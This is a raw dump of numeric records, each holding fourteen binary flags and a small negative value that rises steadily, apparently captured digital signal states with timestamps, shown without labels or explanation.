1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5742800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5740400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5738000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5735600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5733200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5730400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5728000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5725200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5722800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5720400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5718000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5715600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5713200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5710400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5708000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5705200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5702800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5700400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5698000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5695600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5693200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5690400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5688000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5685200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5682800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5680400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5678000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5675600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5673200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5670400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5668000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5665200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5662800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5660400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5658000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5655600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5653200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5650400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5648000e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5647600e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5645200e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5642800e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5640400e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5638000e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5635600e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5633200e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5630400e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5628000e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5625200e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5622800e-04 1,1,0,1,0,1,0,0,0,1,0,0,1,0,-6.5620400e-04 1,1,0,1,0,1,0,0,0,1,0,0,0,0,-6.5618000e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5617200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5615600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5613200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5610400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5608000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5605200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5602800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5600400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5598000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5595600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5593200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5590400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5588000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5585200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5582800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5580400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5578000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5575600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5573200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5570400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5568000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5565200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5562800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5560400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5558000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5555600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5553200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5550400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5548000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5545200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5542800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5540400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5538000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5535600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5533200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5530400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5528000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5525200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5522800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5520400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5518000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5515600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5513200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5510400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5508000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5505200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5502800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5500400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5498000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5495600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5493200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5490400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5488000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5485200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5482800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5480400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5478000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5475600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5473200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5470400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5468000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5465200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5462800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5460400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5458000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5455600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5453200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5450400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5448000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5445200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5442800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5440400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5438000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5435600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5433200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5430400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5428000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5425200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5422800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5420400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5418000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5415600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5413200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5410400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5408000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5405200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5402800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5400400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5398000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5395600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5393200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5390400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5388000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5385200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5382800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5380400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5378000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5375600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5373200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5370400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5368000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5365200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5362800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5360400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5358000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5355600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5353200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5350400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5348000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5345200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5342800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5340400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5338000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5335600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5333200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5330400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5328000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5325200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5322800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5320400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5318000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5315600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5313200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5310400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5308000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5305200e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5302800e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5300400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5298000e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5295600e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5293200e-04 1,1,0,1,0,0,0,0,0,0,0,0,1,0,-6.5290400e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,0,-6.5288000e-04 1,1,0,1,0,0,0,0,0,0,0,0,0,1,-5.2787600e-04 0,0,0,1,0,0,0,0,0,0,0,0,0,1,-5.2767600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,1,-5.2766000e-04 0,0,1,1,0,0,0,0,0,0,0,1,0,1,-5.2762800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,1,-5.2760000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,1,-5.2729200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,1,-5.2726800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,1,-5.2724400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,1,-5.2722000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,1,-5.2719600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,1,-5.2717200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,1,-5.2714400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,1,-5.2712000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,1,-5.2709200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,1,-5.2706800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2704400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2702000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2699600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2697200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2694400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2692000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2689200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2686800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2684400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2682000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2676800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2674400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2672000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2669200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2666800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2664400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2662000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2659600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2657200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2654400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2652000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2649200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2646800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2644400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2642000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2639600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2637200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2634400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2632000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2629200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2626800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2624400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2619600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2617200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2614400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2612000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2609200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2606800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2604400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2602000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2599600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2597200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2594400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2592000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2589200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2586800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2584400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2582000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2579600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2577200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2574400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2572000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2569200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2566800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2564400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2562000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2559600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2557200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2554400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2552000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2546800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2544400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2539600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2537200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2531600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2529200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2524400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2522000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2516800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2514400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2509200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2506800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2504400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2502000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2499600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2497200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2494400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2492000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2489200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2486800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2484400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2482000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2479600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2477200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2474400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2472000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2469200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2466800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2464400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2462000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2459600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2457200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2454400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2452000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2449200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2446800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2444400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2442000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2439600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2437200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2434400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2432000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2429200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2426800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2424400e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2422000e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2419600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2417200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2411600e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2409200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2406800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2404400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2402000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2399200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2397200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2394400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2392000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2389200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2386800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2384400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2382000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2379600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2377200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2374400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2372000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2369200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2366800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2364400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2362000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2359600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2357200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2354400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2352000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2349200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2346800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2344400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2342000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2339600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2337200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2334400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2332000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2329200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2326800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2324400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2322000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2319600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2317200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2314400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2312000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2309200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2306800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2304400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2302000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2299600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2297200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2294400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2292000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2289200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2286800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2284800e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2282000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2279600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2277200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2274400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2272000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2269200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2266800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2264400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2262000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2259600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2257200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2254400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2252000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2249200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2246800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2244400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2242000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2239600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2237200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2234400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2232000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2229200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2226800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2224400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2222000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2219600e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2217200e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2214400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2212000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2209200e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2206800e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2204400e-04 0,0,1,1,0,0,0,0,0,0,0,0,1,0,-5.2202000e-04 0,0,1,1,0,0,0,0,0,0,0,0,0,0,-5.2199600e-04 